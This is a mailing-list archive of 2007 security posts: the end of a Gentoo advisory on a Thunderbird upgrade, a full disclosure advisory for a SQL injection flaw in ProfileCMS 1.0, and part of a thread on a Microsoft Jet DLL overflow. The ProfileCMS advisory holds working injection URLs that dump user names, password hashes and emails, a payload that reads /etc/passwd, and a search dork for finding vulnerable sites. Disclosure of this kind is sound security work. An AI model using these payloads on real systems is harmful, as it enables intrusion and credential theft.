There is no known workaround at this time for all of these issues, but
some of them can be avoided by disabling JavaScript.

Resolution
==

All Mozilla Thunderbird users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose
">=mail-client/mozilla-thunderbird-2.0.0.9"

All Mozilla Thunderbird binary users should upgrade to the latest
version:

# emerge --sync
# emerge --ask --oneshot --verbose
">=mail-client/mozilla-thunderbird-bin-2.0.0.9"

References
==

  [ 1 ] CVE-2007-5339
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5339
  [ 2 ] CVE-2007-5340
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5340
  [ 3 ] GLSA 200711-14
http://www.gentoo.org/security/en/glsa/glsa-200711-14.xml

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-24.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQK+juhJ+ozIKI5gRAvrmAJwIT9nGWtqALR9wOwqrpfCozEOVRgCfR36N
iiySbPAelqZNMW6jkMzSt6w=
=6BMP
-END PGP SIGNATURE-

[ECHO_ADV_84$2007] ProfileCMS <= 1.0 Remote SQL Injection Vulnerability

[erdc]

ECHO_ADV_84$2007


-

[ECHO_ADV_84$2007] ProfileCMS <= 1.0 Remote SQL Injection Vulnerability

-


Author : M.Hasran Addahroni

Date   : November, 17 th 2007

Location   : Australia, Sydney

Web: http://advisories.echo.or.id/adv/adv84-K-159-2007.txt

Critical Lvl   : Dangerous

Impact : System access

Where  : From Remote

---


Affected software description:

~~~


Application   : ProfileCMS  

version   : <= 1.0

Vendor: http://profilecms.com/

Description :


ProfileCMS is a powerful Content Management System for Social Networking 
profile codes and widgets. There are no other scripts that offer the freedom, 
features and practicality of ProfileCMS, we have constructed a easy to use, 
accessable platform for both webmasters and front end users. Based on the 
popular MSCMS system which has been the Number 1 Myspace Content Management 
System for almost 1 year now, ProfileCMS allows webmasters to take advantage of 
the ever growing popularity of social netowrking sites and offer users codes 
and widgets from ANY social network.


---


Vulnerability:

~


Input passed to the "id" parameter in profiles-codes, video-codes, and 
arcade-games modules is not properly verified before being used to sql query. 

This can be exploited thru the browser and get the hash md5 password from users.

Successful exploitation requires that "magic_quotes" is off.



Poc/Exploit:

~


http://target.com/index.php?app=profile-codes&action=codes&id=-1%20union%20select%201,2,concat(id,0x3a,username,0x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20users/*

http://target.org/index.php?app=video-codes&action=videos&id=-1%20union%20select%201,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6%20from%20users/*

http://target.net/index.php?app=arcade-games&action=games&id=-1%20union%20select%201,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6%20from%20users/*

http://target.net/index.php?app=arcade-games&action=games&id=-1%20union%20select%201,load_file(0x2f6574632f706173737764),3,4,5,6%20from%20users/*


Dork:



Google: "Powered By ProfileCMS v1.0" or "Total Generators & Widgets"

Altavista.com : "Total Generators & Widgets"



Solution:

~~


- Edit the source code to ensure that input is properly verified.

- Turn on magic_quotes in php.ini

 


Timeline:




- 15 -11 - 2007 bug found

- 15 -11 - 2007 vendor contacted

- 17 -11 - 2007 publish advisory

---


Shoutz:



~ ping - my dearest wife, 'zizou' zautha - my lovely son, for all the luv, the 
tears n the breath

~ y3dips,the_day,m0by,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, 
az01,negative,the_hydra, str0ke

~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw

~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, 
stev_manado, nofry,ketut,x16

~ [EMAIL PROTECTED]

~ #aikmel #e-c-h-o @irc.dal.net


---

Contact:

~


 K-159 || echo|staff || eufrato[at]gmail[dot]com

 Homepage: http://k-159.echo.or.id/


 [ EOF ] --

Re: Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability

[Juha-Matti Laurio]

There is a well-known unpatched code execution type vulnerability reported 
originally in msjet40.dll version 4.00.8618.0 too.
This issue reported by HexView is known since March 2005:

http://www.securityfocus.com/bid/12960
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0944

We probably don't see a fix for this issue.

- Juha-Matti

"CaseArmour.net Security Administrator" <[EMAIL PROTECTED]> kirjoitti: 

It would be useful to know if this is also an issue with msjet40.dll
4.0.9510.0 (Windows Server 2003 SP2 + hotfixes).  I have an installer
for Windows XP SP2 that -- seems -- to cleanly apply Windows Server 2003
SP2's MDAC 2.82.  I haven't been able to give it a serious, hard testing
because I don't have many apps that still use MDAC.

On Fri, 16 Nov 2007 19:25:29 +0800, "cocoruder" <[EMAIL PROTECTED]>
said:
>
> (C:\Windows\System32\msjet40.dll, version is 4.0.8618.0)